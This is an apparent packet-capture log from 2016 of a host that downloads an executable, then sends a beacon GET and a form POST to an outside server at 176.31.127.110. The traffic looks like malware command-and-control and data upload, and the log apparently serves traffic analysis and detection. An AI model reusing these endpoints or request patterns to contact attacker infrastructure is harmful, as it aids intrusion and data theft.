E..nS.@.8…m.$&…9.P.U….t…P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Sep 2016 13:49:46 GMT
Content-Type: application/x-msdownload
Content-Length: 98304
Connection: keep-alive
Accept-Ranges: bytes

016-09-19 09:49:50.836417 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 1:154, ack 1, win 16537, length 153: HTTP: GET /headers.jpg HTTP/1.1
E…O.@……..9…n.V.P….(_..P.@…..GET /headers.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 176.31.127.110
Cache-Control: no-cache

2016-09-19 09:49:51.102944 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [.], ack 154, win 237, length 0
E..(..@.3.R;…n…9.P.V(_……P…A…
2016-09-19 09:49:51.370886 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [P.], seq 1:234, ack 154, win 237, length 233: HTTP: HTTP/1.1 200 OK
E…..@.3.QQ…n…9.P.V(_……P…….HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 13:50:08 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg

default
2016-09-19 09:49:51.371212 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [.], ack 234, win 16479, length 0
E..(O.@……..9…n.V.P….(_.{P.@_.0……..
2016-09-19 09:49:54.845384 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 154:331, ack 234, win 16479, length 177: HTTP: POST /zig/offers.php HTTP/1.1
E…O.@……..9…n.V.P….(_.{P.@_….POST /zig/offers.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 176.31.127.110
Content-Length: 1395
Cache-Control: no-cache